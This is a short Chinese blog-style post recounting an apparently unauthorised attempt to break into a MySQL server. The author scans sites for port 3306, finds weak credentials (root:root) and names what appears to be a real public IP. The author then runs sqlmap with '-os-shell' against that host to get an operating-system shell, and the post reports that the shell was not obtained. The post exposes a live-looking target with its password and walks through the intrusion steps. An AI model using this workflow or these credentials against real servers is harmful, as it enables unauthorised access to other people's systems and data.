前提
首先采集网站url,然后通过url域名转化为ip,再通过端口扫描探测出想要的端口,比如3306
然后进行弱口令探测
然后我探测出某弱口令
拿shell
登上服务器,首先安装sqlmap
wget https://github.com/sqlmapproject/sqlmap/tarball/master
tar -zxvf master
cd sqlmapproject-sqlmap-de63238/
成功
python2 sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell
提示报错
image.png
需要“python pymysql”第三方库
python2 -m pip install pymysql
报错
换了一台服务器 python2.6.6
python sqlmap.py -d "mysql://root:root@47.111.166.53:3306/mysql" -os-shell
先安装pip
curl https://bootstrap.pypa.io/2.6/get-pip.py -o get-pip.py
python get-pip.py
pip install pymysql
再次运行 还是不行
image.png
网上参考到直接github下载组件
组件
我直接本机安装 然后可以运行了 不过把MySQL服务判断为了oracle
orcale
....结局利用sqlmap拿shell失败
网友评论